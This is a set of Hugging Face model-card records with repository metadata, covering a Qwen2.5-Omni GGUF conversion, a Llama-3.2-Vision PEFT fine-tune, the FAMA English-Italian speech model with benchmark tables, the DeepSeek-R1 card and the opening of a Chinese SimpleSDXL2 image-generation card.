--- license: other license_name: apache-2.0 license_link: https://huggingface.co/Qwen/Qwen2.5-Omni-7B/blob/main/LICENSE language: - en tags: - multimodal - llama-cpp - gguf-my-repo library_name: transformers pipeline_tag: any-to-any base_model: Qwen/Qwen2.5-Omni-7B --- # RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF This model was converted to GGUF format from [`Qwen/Qwen2.5-Omni-7B`](https://huggingface.co/Qwen/Qwen2.5-Omni-7B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/Qwen/Qwen2.5-Omni-7B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -c 2048 ```
RoyRoyRpy/test_fine-tuned-visionllama_100_epo1
RoyRoyRpy
2025-05-30T08:14:34Z
0
0
peft
[ "peft", "tensorboard", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:meta-llama/Llama-3.2-11B-Vision-Instruct", "base_model:adapter:meta-llama/Llama-3.2-11B-Vision-Instruct", "license:llama3.2", "region:us" ]
null
2025-05-30T08:14:08Z
--- library_name: peft license: llama3.2 base_model: meta-llama/Llama-3.2-11B-Vision-Instruct tags: - trl - sft - generated_from_trainer model-index: - name: test_fine-tuned-visionllama_100_epo1 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # test_fine-tuned-visionllama_100_epo1 This model is a fine-tuned version of [meta-llama/Llama-3.2-11B-Vision-Instruct](https://huggingface.co/meta-llama/Llama-3.2-11B-Vision-Instruct) on an unknown dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0002 - train_batch_size: 10 - eval_batch_size: 8 - seed: 42 - gradient_accumulation_steps: 8 - total_train_batch_size: 80 - optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08 - lr_scheduler_type: constant - lr_scheduler_warmup_ratio: 0.03 - num_epochs: 1 ### Training results ### Framework versions - PEFT 0.13.0 - Transformers 4.45.1 - Pytorch 2.4.0+cu121 - Datasets 3.0.1 - Tokenizers 0.20.3
FBK-MT/fama-medium
FBK-MT
2025-05-30T08:14:10Z
5
1
null
[ "safetensors", "conformer_encoder_decoder", "speech", "speech recognition", "speech translation", "ASR", "ST", "custom_code", "en", "it", "dataset:FBK-MT/mosel", "dataset:facebook/covost2", "dataset:openslr/librispeech_asr", "dataset:facebook/voxpopuli", "arxiv:2505.22759", "license:cc-by-4.0", "region:us" ]
null
2025-03-31T17:01:17Z
--- license: cc-by-4.0 language: - en - it datasets: - FBK-MT/mosel - facebook/covost2 - openslr/librispeech_asr - facebook/voxpopuli metrics: - comet - wer tags: - speech - speech recognition - speech translation - ASR - ST --- # FAMA-medium <div> <img src="FAMA.png" width="100%" alt="FAMA" /> </div> ## Table of Contents 1. [Overview](#overview) 2. [Usage](#Usage) 3. [Results](#Results) 4. [License](#license) 5. [Citation](#citation) ## Overview FAMA is the first family of large-scale open-science SFMs for English and Italian trained on [over 150k hours of exclusively open-source(OS)-compliant speech data](https://huggingface.co/datasets/FBK-MT/fama-data). FAMA models achieve [remarkable results](#results), with ASR and ST improvements on average across languages compared to OWSM, and is competitive in terms of ASR performance with the Whisper model family while being up to 8 times faster. All the artifacts used for realizing FAMA models, including codebase, datasets, and models themself are [released under OS-compliant licenses](#license), promoting a more responsible creation of models in our community. It is available in 2 sizes, with 2 variants for ASR only: - [FAMA-small](https://huggingface.co/FBK-MT/fama-small) - 475 million parameters - [FAMA-medium](https://huggingface.co/FBK-MT/fama-medium) - 878 million parameters - [FAMA-small-asr](https://huggingface.co/FBK-MT/fama-small-asr) - 475 million parameters - [FAMA-medium-asr](https://huggingface.co/FBK-MT/fama-medium-asr) - 878 million parameters For more information about FAMA, please check our [blog post](https://huggingface.co/blog/FAMA/release) and the [arXiv](https://arxiv.org/abs/2505.22759) preprint. ## Usage FAMA models are supported in Hugging Face 🤗 Transformers. To run the model, first install the Transformers and Datasets libraries. ```sh pip install transformers==4.48.1 datasets ``` To perform a single inference on a sample audio file using the [`pipeline`](https://huggingface.co/docs/transformers/main_classes/pipelines#transformers.AutomaticSpeechRecognitionPipeline) class, run: ```python import torch from transformers import AutoProcessor, pipeline from datasets import load_dataset model_id = "FBK-MT/fama-medium" processor = AutoProcessor.from_pretrained(model_id) device = "cuda:0" if torch.cuda.is_available() else "cpu" tgt_lang = "en" # Force the model to start with the language tag lang_tag = "<lang:{}>".format(tgt_lang) lang_tag_id = processor.tokenizer.convert_tokens_to_ids(lang_tag) generate_kwargs = {"num_beams": 5, "no_repeat_ngram_size": 5, "forced_bos_token_id": lang_tag_id} pipe = pipeline( "automatic-speech-recognition", model=model_id, trust_remote_code=True, torch_dtype=torch.float32, device=device, return_timestamps=False, generate_kwargs=generate_kwargs ) dataset = load_dataset("distil-whisper/librispeech_asr_dummy", "clean", split="validation") sample = dataset[0]["audio"] result = pipe(sample) print(result["text"]) ``` Where `tgt_lang` is the target language (either `en` or `it`). The source languages has not to be specified. To run the inference on a local audio file `audio.wav`, call the pipeline with: ```python result = pipe("audio.wav") ``` To perform a batch inference with size `batch_size`, run: ```python result = pipe(["audio_1.wav", "audio_2.wav"], batch_size=2) ``` For the inference, we suggest converting the audio files in wav format with 16kHz sampling rate and 1 channel. ## Results We evaluate FAMA on ASR and ST tasks using popular open-source datasets such as CommonVoice, Multilingual LibriSpeech (MLS), VoxPopuli, CoVoST2 and FLEURS. The metrics used are WER (↓) for ASR, and COMET (↑) for ST. We also benchmark FAMA in terms of computational time and maximum batch size supported on HuggingFace against Whisper and SeamlessM4T models. The metric used is the inverse real time factor (xRTF). **Key highlights:** - FAMA achieves up to 4.2 WER and 0.152 COMET improvement on average across languages compared to OWSM v3.1 - FAMA is up to 8 times faster than Whisper large-v3 while achieving comparable ASR performance ### Automatic Speech Recogniton (ASR) | ***Model/Dataset WER (↓)*** | **CommonVoice**-*en* | **CommonVoice**-*it* | **MLS**-*en* | **MLS**-*it* | **VoxPopuli**-*en* | **VoxPopuli**-*it* | **AVG**-*en* | **AVG**-*it* | |-----------------------------------------|---------|---------|---------|---------|---------|----------|---------|----------| | Whisper *medium* | 14.5 | 10.4 | 14.2 | 15.9 | 8.1 | 26.8 | 12.3 | 17.7 | | Whisper *large-v3* | 11.2 | 6.5 | **5.0** | 8.8 | 7.1 | 18.8 | 7.8 | 11.4 | | OWSM v3.1 *medium* | 11.9 | 12.5 | 6.6 | 19.3 | 8.4 | 24.0 | 9.0 | 18.6 | | SeamlessM4T *medium* | 10.7 | 7.8 | 8.8 | 11.3 | 10.2 | 18.2 | 9.9 | 12.4 | | SeamlessM4T *v2-large* | **7.7** | **5.0** | 6.4 | **8.5** | **6.9** | 16.6 | **7.0** | **10.0** | | FAMA-ASR *small* | 13.8 | 8.9 | 5.8 | 12.6 | 7.2 | 15.7 | 8.9 | 12.4 | | FAMA-ASR *medium* | 11.7 | 7.1 | 5.1 | 12.2 | 7.0 | 15.9 | 7.9 | 11.7 | | FAMA *small* | 13.7 | 8.6 | 5.8 | 12.8 | 7.3 | **15.6** | 8.9 | 12.3 | | FAMA *medium* | 11.5 | 7.0 | 5.2 | 13.9 | 7.2 | 15.9 | 8.0 | 12.3 | ### Speech Translation (ST) | ***Model/Dataset WER (↓)*** | **CoVoST2**-*it→en* | **FLEURS**-*en→it* | |-----------------------------------------|---------------------|--------------------| | Whisper *medium* | 0.801 | - | | Whisper *large-v3* | 0.825 | - | | OWSM v3.1 *medium* | 0.636 | 0.337 | | SeamlessM4T *medium* | 0.831 | 0.820 | | SeamlessM4T *v2-large* | **0.852** | **0.855** | | FAMA *small* | 0.774 | 0.807 | | FAMA *medium* | 0.787 | 0.821 | ### Computational Time and Maximum Batch Size | ***Model*** | ***Batch Size*** | ***xRTF en (↑)*** | ***xRTF it (↑)*** | ***xRTF AVG (↑)*** | |------------------------|------------|-------------|-------------|--------------| | Whisper *medium* | 8 | 13.3 | 10.9 | 12.1 | | Whisper *large-v3* | 4 | 7.9 | 6.5 | 7.2 | | SeamlessM4T *medium* | 2 | 28.5 | 26.2 | 27.4 | | SeamlessM4T *v2-large* | 2 | 13.7 | 13.3 | 13.5 | | FAMA *small* | 16 | **57.4** | **56.0** | **56.7** | | FAMA *medium* | 8 | 39.5 | 41.2 | 40.4 | ## License We release the FAMA model weights, and training data under the CC-BY 4.0 license. The training data can be found in [FAMA Training Data](https://huggingface.co/datasets/FBK-MT/fama-data). The [original FBK-fairseq codebase](https://github.com/hlt-mt/FBK-fairseq) used to train the model is released under the Apache 2.0 license. ## Citation If you use FAMA in your work, please cite: ``` @misc{papi2025fama, title={FAMA: The First Large-Scale Open-Science Speech Foundation Model for English and Italian}, author={Sara Papi and Marco Gaido and Luisa Bentivogli and Alessio Brutti and Mauro Cettolo and Roberto Gretter and Marco Matassoni and Mohamed Nabih and Matteo Negri}, year={2025} } ```
growwgm/VBNG
growwgm
2025-05-30T08:13:31Z
0
0
null
[ "license:bigscience-bloom-rail-1.0", "region:us" ]
null
2025-05-30T08:13:31Z
--- license: bigscience-bloom-rail-1.0 ---
Jackmin108/qwen-7b-rl-step-32
Jackmin108
2025-05-30T08:13:24Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:2501.12948", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T05:04:09Z
--- license: mit library_name: transformers --- # DeepSeek-R1 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/DeepSeek_R1.pdf"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction We introduce our first-generation reasoning models, DeepSeek-R1-Zero and DeepSeek-R1. DeepSeek-R1-Zero, a model trained via large-scale reinforcement learning (RL) without supervised fine-tuning (SFT) as a preliminary step, demonstrated remarkable performance on reasoning. With RL, DeepSeek-R1-Zero naturally emerged with numerous powerful and interesting reasoning behaviors. However, DeepSeek-R1-Zero encounters challenges such as endless repetition, poor readability, and language mixing. To address these issues and further enhance reasoning performance, we introduce DeepSeek-R1, which incorporates cold-start data before RL. DeepSeek-R1 achieves performance comparable to OpenAI-o1 across math, code, and reasoning tasks. To support the research community, we have open-sourced DeepSeek-R1-Zero, DeepSeek-R1, and six dense models distilled from DeepSeek-R1 based on Llama and Qwen. DeepSeek-R1-Distill-Qwen-32B outperforms OpenAI-o1-mini across various benchmarks, achieving new state-of-the-art results for dense models. **NOTE: Before running DeepSeek-R1 series models locally, we kindly recommend reviewing the [Usage Recommendation](#usage-recommendations) section.** <p align="center"> <img width="80%" src="figures/benchmark.jpg"> </p> ## 2. Model Summary --- **Post-Training: Large-Scale Reinforcement Learning on the Base Model** - We directly apply reinforcement learning (RL) to the base model without relying on supervised fine-tuning (SFT) as a preliminary step. This approach allows the model to explore chain-of-thought (CoT) for solving complex problems, resulting in the development of DeepSeek-R1-Zero. DeepSeek-R1-Zero demonstrates capabilities such as self-verification, reflection, and generating long CoTs, marking a significant milestone for the research community. Notably, it is the first open research to validate that reasoning capabilities of LLMs can be incentivized purely through RL, without the need for SFT. This breakthrough paves the way for future advancements in this area. - We introduce our pipeline to develop DeepSeek-R1. The pipeline incorporates two RL stages aimed at discovering improved reasoning patterns and aligning with human preferences, as well as two SFT stages that serve as the seed for the model's reasoning and non-reasoning capabilities. We believe the pipeline will benefit the industry by creating better models. --- **Distillation: Smaller Models Can Be Powerful Too** - We demonstrate that the reasoning patterns of larger models can be distilled into smaller models, resulting in better performance compared to the reasoning patterns discovered through RL on small models. The open source DeepSeek-R1, as well as its API, will benefit the research community to distill better smaller models in the future. - Using the reasoning data generated by DeepSeek-R1, we fine-tuned several dense models that are widely used in the research community. The evaluation results demonstrate that the distilled smaller dense models perform exceptionally well on benchmarks. We open-source distilled 1.5B, 7B, 8B, 14B, 32B, and 70B checkpoints based on Qwen2.5 and Llama3 series to the community. ## 3. Model Downloads ### DeepSeek-R1 Models <div align="center"> | **Model** | **#Total Params** | **#Activated Params** | **Context Length** | **Download** | | :------------: | :------------: | :------------: | :------------: | :------------: | | DeepSeek-R1-Zero | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Zero) | | DeepSeek-R1 | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1) | </div> DeepSeek-R1-Zero & DeepSeek-R1 are trained based on DeepSeek-V3-Base. For more details regarding the model architecture, please refer to [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repository. ### DeepSeek-R1-Distill Models <div align="center"> | **Model** | **Base Model** | **Download** | | :------------: | :------------: | :------------: | | DeepSeek-R1-Distill-Qwen-1.5B | [Qwen2.5-Math-1.5B](https://huggingface.co/Qwen/Qwen2.5-Math-1.5B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) | | DeepSeek-R1-Distill-Qwen-7B | [Qwen2.5-Math-7B](https://huggingface.co/Qwen/Qwen2.5-Math-7B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-7B) | | DeepSeek-R1-Distill-Llama-8B | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-8B) | | DeepSeek-R1-Distill-Qwen-14B | [Qwen2.5-14B](https://huggingface.co/Qwen/Qwen2.5-14B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B) | |DeepSeek-R1-Distill-Qwen-32B | [Qwen2.5-32B](https://huggingface.co/Qwen/Qwen2.5-32B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-32B) | | DeepSeek-R1-Distill-Llama-70B | [Llama-3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-70B) | </div> DeepSeek-R1-Distill models are fine-tuned based on open-source models, using samples generated by DeepSeek-R1. We slightly change their configs and tokenizers. Please use our setting to run these models. ## 4. Evaluation Results ### DeepSeek-R1-Evaluation For all our models, the maximum generation length is set to 32,768 tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 64 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | Claude-3.5-Sonnet-1022 | GPT-4o 0513 | DeepSeek V3 | OpenAI o1-mini | OpenAI o1-1217 | DeepSeek R1 | |----------|-------------------|----------------------|------------|--------------|----------------|------------|--------------| | | Architecture | - | - | MoE | - | - | MoE | | | # Activated Params | - | - | 37B | - | - | 37B | | | # Total Params | - | - | 671B | - | - | 671B | | English | MMLU (Pass@1) | 88.3 | 87.2 | 88.5 | 85.2 | **91.8** | 90.8 | | | MMLU-Redux (EM) | 88.9 | 88.0 | 89.1 | 86.7 | - | **92.9** | | | MMLU-Pro (EM) | 78.0 | 72.6 | 75.9 | 80.3 | - | **84.0** | | | DROP (3-shot F1) | 88.3 | 83.7 | 91.6 | 83.9 | 90.2 | **92.2** | | | IF-Eval (Prompt Strict) | **86.5** | 84.3 | 86.1 | 84.8 | - | 83.3 | | | GPQA-Diamond (Pass@1) | 65.0 | 49.9 | 59.1 | 60.0 | **75.7** | 71.5 | | | SimpleQA (Correct) | 28.4 | 38.2 | 24.9 | 7.0 | **47.0** | 30.1 | | | FRAMES (Acc.) | 72.5 | 80.5 | 73.3 | 76.9 | - | **82.5** | | | AlpacaEval2.0 (LC-winrate) | 52.0 | 51.1 | 70.0 | 57.8 | - | **87.6** | | | ArenaHard (GPT-4-1106) | 85.2 | 80.4 | 85.5 | 92.0 | - | **92.3** | | Code | LiveCodeBench (Pass@1-COT) | 33.8 | 34.2 | - | 53.8 | 63.4 | **65.9** | | | Codeforces (Percentile) | 20.3 | 23.6 | 58.7 | 93.4 | **96.6** | 96.3 | | | Codeforces (Rating) | 717 | 759 | 1134 | 1820 | **2061** | 2029 | | | SWE Verified (Resolved) | **50.8** | 38.8 | 42.0 | 41.6 | 48.9 | 49.2 | | | Aider-Polyglot (Acc.) | 45.3 | 16.0 | 49.6 | 32.9 | **61.7** | 53.3 | | Math | AIME 2024 (Pass@1) | 16.0 | 9.3 | 39.2 | 63.6 | 79.2 | **79.8** | | | MATH-500 (Pass@1) | 78.3 | 74.6 | 90.2 | 90.0 | 96.4 | **97.3** | | | CNMO 2024 (Pass@1) | 13.1 | 10.8 | 43.2 | 67.6 | - | **78.8** | | Chinese | CLUEWSC (EM) | 85.4 | 87.9 | 90.9 | 89.9 | - | **92.8** | | | C-Eval (EM) | 76.7 | 76.0 | 86.5 | 68.9 | - | **91.8** | | | C-SimpleQA (Correct) | 55.4 | 58.7 | **68.0** | 40.3 | - | 63.7 | </div> ### Distilled Model Evaluation <div align="center"> | Model | AIME 2024 pass@1 | AIME 2024 cons@64 | MATH-500 pass@1 | GPQA Diamond pass@1 | LiveCodeBench pass@1 | CodeForces rating | |------------------------------------------|------------------|-------------------|-----------------|----------------------|----------------------|-------------------| | GPT-4o-0513 | 9.3 | 13.4 | 74.6 | 49.9 | 32.9 | 759 | | Claude-3.5-Sonnet-1022 | 16.0 | 26.7 | 78.3 | 65.0 | 38.9 | 717 | | o1-mini | 63.6 | 80.0 | 90.0 | 60.0 | 53.8 | **1820** | | QwQ-32B-Preview | 44.0 | 60.0 | 90.6 | 54.5 | 41.9 | 1316 | | DeepSeek-R1-Distill-Qwen-1.5B | 28.9 | 52.7 | 83.9 | 33.8 | 16.9 | 954 | | DeepSeek-R1-Distill-Qwen-7B | 55.5 | 83.3 | 92.8 | 49.1 | 37.6 | 1189 | | DeepSeek-R1-Distill-Qwen-14B | 69.7 | 80.0 | 93.9 | 59.1 | 53.1 | 1481 | | DeepSeek-R1-Distill-Qwen-32B | **72.6** | 83.3 | 94.3 | 62.1 | 57.2 | 1691 | | DeepSeek-R1-Distill-Llama-8B | 50.4 | 80.0 | 89.1 | 49.0 | 39.6 | 1205 | | DeepSeek-R1-Distill-Llama-70B | 70.0 | **86.7** | **94.5** | **65.2** | **57.5** | 1633 | </div> ## 5. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 6. How to Run Locally ### DeepSeek-R1 Models Please visit [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repo for more information about running DeepSeek-R1 locally. **NOTE: Hugging Face's Transformers has not been directly supported yet.** ### DeepSeek-R1-Distill Models DeepSeek-R1-Distill models can be utilized in the same manner as Qwen or Llama models. For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm): ```shell vllm serve deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --tensor-parallel-size 2 --max-model-len 32768 --enforce-eager ``` You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang) ```bash python3 -m sglang.launch_server --model deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --trust-remote-code --tp 2 ``` ### Usage Recommendations **We recommend adhering to the following configurations when utilizing the DeepSeek-R1 series models, including benchmarking, to achieve the expected performance:** 1. Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs. 2. **Avoid adding a system prompt; all instructions should be contained within the user prompt.** 3. For mathematical problems, it is advisable to include a directive in your prompt such as: "Please reason step by step, and put your final answer within \boxed{}." 4. When evaluating model performance, it is recommended to conduct multiple tests and average the results. Additionally, we have observed that the DeepSeek-R1 series models tend to bypass thinking pattern (i.e., outputting "\<think\>\n\n\</think\>") when responding to certain queries, which can adversely affect the model's performance. **To ensure that the model engages in thorough reasoning, we recommend enforcing the model to initiate its response with "\<think\>\n" at the beginning of every output.** ## 7. License This code repository and the model weights are licensed under the [MIT License](https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE). DeepSeek-R1 series support commercial use, allow for any modifications and derivative works, including, but not limited to, distillation for training other LLMs. Please note that: - DeepSeek-R1-Distill-Qwen-1.5B, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Qwen-14B and DeepSeek-R1-Distill-Qwen-32B are derived from [Qwen-2.5 series](https://github.com/QwenLM/Qwen2.5), which are originally licensed under [Apache 2.0 License](https://huggingface.co/Qwen/Qwen2.5-1.5B/blob/main/LICENSE), and now finetuned with 800k samples curated with DeepSeek-R1. - DeepSeek-R1-Distill-Llama-8B is derived from Llama3.1-8B-Base and is originally licensed under [llama3.1 license](https://huggingface.co/meta-llama/Llama-3.1-8B/blob/main/LICENSE). - DeepSeek-R1-Distill-Llama-70B is derived from Llama3.3-70B-Instruct and is originally licensed under [llama3.3 license](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct/blob/main/LICENSE). ## 8. Citation ``` @misc{deepseekai2025deepseekr1incentivizingreasoningcapability, title={DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning}, author={DeepSeek-AI}, year={2025}, eprint={2501.12948}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.12948}, } ``` ## 9. Contact If you have any questions, please raise an issue or contact us at [[email protected]]([email protected]).
metercai/SimpleSDXL2
metercai
2025-05-30T08:13:22Z
1,246
32
diffusers
[ "diffusers", "onnx", "safetensors", "gguf", "license:apache-2.0", "region:us" ]
null
2024-05-30T13:46:27Z
--- license: apache-2.0 --- ## SimpleSDXL2 - 最强中文创意生图,6G显存玩转混元、可图、SD3m和Flux! <div align=center><img src="https://github.com/user-attachments/assets/98715a4d-9f4a-4846-ae62-eb8d69793d31"></div> ### 🚀 B站视频推荐:[6G显存玩转Flux](https://www.bilibili.com/video/BV1KJWreyEuU) : https://www.bilibili.com/video/BV1KJWreyEuU ### 🚀 飞书wiki: [《SimpleSDXL创意生图应用指南》](https://acnmokx5gwds.feishu.cn/wiki/QK3LwOp2oiRRaTkFRhYcO4LonGe), 包括如何快速下载、安装和运行,如何操作进行创意出图,在不同场景下如何使用SimpleSDXL等等。 ## 🔔 最新更新 / Update - [2024-09-16] <b>解锁Flux的lora和可图lora。自动修图开关移到增强修图标签内。添加提示面板开关,可点击触发批量通配符面板。反推提示词和图片参数提取两个标签移入参数设置栏。添加基于预置包的基础模型过滤功能。修复Comfyd引擎的跳过和中断逻辑bug。优化预置包参数和预置包导航。Flux模型自动适配硬件环境。优选Hyp8Q5KM模型,支持Flux Lora,兼具速度与质量的平衡。新增两个无缝贴图的预置包。升级comfyd到最新版。优化下载安装和启动流程,强制基础包检测,并提供模型包安装脚本。</b> - [2024.08.20] 新架构进一步优化,提升在Windows环境的兼容性,压缩Fooocus和Comfy后端切换的资源消耗。优化支持最低6G显存的Flux模型出图,提供质量优先的Fluxdev和速度优先的Flux+两个预置包,并可根据系统资源自动适配。同步升级主线v2.5.5,优化增强修图UI,更符合Fooocus交互习惯。 - [2024.07.31] 优化了新架构,更稳定,更快速。新增对快手可图模型的支持,使SimpleSDXL2除SDXL外,以6G显卡显存同时支持: 小马v6/Playground-v2.5/SD3m/混元/可图等多种模型出图,适用更多场景。同步主线v2.5.2,并对修图界面进行优化和适配,使之更容易被中文用户理解和使用。 - [2024.06.30] 扩展架构,新增Comfy后端,全新升级SimpleSDXL2。支持SDXL、混元、SD3和Playground-v2.5本地模型,最低6G显卡内存可用,保持Fooocus简洁、高效和稳定的出图风格。新增融图打光模块,可自主生成前景及蒙版,可自动抠取产品或人物图片切换场景进行融合。升级OBP一键提示词到最新版。UI整体优化。 - [2024.05.28] 同步主线升级到v2.4.3,新增nsfw过滤等功能。 - [2024.04.23] 升级OBP到最新版,集成[Superprompt](https://huggingface.co/roborovski/superprompt-v1)超级提示词扩展,为提示词增补细节描写。新增SD3生图引擎接口,可到[stability.ai](https://stability.ai/membership)申请免费会员,获取接口密钥后无缝对接SD3新引擎生成图片。优化界面,包括将OBP和Superprompt入口整合到提示词框,新增预置包导航浮层提示、提示词框token数统计、图生图多个参数前置到操作页面等。 <b>重要:如果项目给您带来了便利和价值,不要吝惜加颗星"⭐️",促进项目更好的发展!😜<br> Note: Please don't forget to give us a star if you like this project. Thanks! 😜</b> ## 下载安装使用,请参考wiki:[《SimpleSDXL创意生图应用指南》](https://acnmokx5gwds.feishu.cn/wiki/QK3LwOp2oiRRaTkFRhYcO4LonGe) ### 如果对旧版情有独钟,可选择不升级,运行旧版 - SimpleSDXL1独立分支的完全包,含环境、程序和默认模型,后续不增功能仅修bug : [SimpleSDXL1_win64_all.zip (30G)](https://hf-mirror.com/metercai/SimpleSDXL2/resolve/main/SimpleSDXL1_win64_all.zip) ## 什么是SimpleSDXL?/ What's SimpleSDXL? - **化繁为简** AI的本质应该是化繁为简,让操作更简洁,让想法更易达成。SimpleSDXL保持Fooocus的易用性,以SDXL模型生态为核心,朝着开源可控,简洁易用,功能完善的方向更进一步。 - **中文适配** 中文环境与英语环境有很多差异。不仅仅在语言文字上,包括思维习惯、操作方式和网络环境都有很多不同。让中文用户使用更简单,用的更爽,也是SimpleSDXL 的原始初衷。 - **场景定制** 文生图和图生图有非常多的使用场景,需要更好的配置定制能力。SimpleSDXL以**预置包和嵌参图片**为基础,面向场景提升Fooocus的**开放性和可定制性**,发挥出SDXL的强大能力。 ## SmipleSDXL2 全新架构 / New Architecture <img width="500" align=center src="https://github.com/metercai/SimpleSDXL/assets/5652458/364df3ce-3420-4cec-b26e-f315c76b4c1e"> ## 对比Fooocus的增强特色 / Enhanced features of Fooocus 在Fooocus基础上增强功能,可无缝升级,同步迭代,并行使用。而且经过了手机适配,PC和手机也可同步操作。<br> Enhanced features base on Fooocus, seamless upgrading and dual versions available synchronous iteration and parallel use. Adapted to mobile, PC and phone can be used synchronously. ### 中英文混编提示词 / Chinese English mixed prompts 在线离线自主选择,支持翻译后再编辑,更适于提示词表达。<br> Offline and online autonomous selection, support editing after translation, more suitable for Prompt. <br> <img width="300" align=right src="https://github.com/metercai/SimpleSDXL/assets/5652458/707999e5-c776-4321-9048-5ad275263ff0"> - [x] **中英文混合编辑** 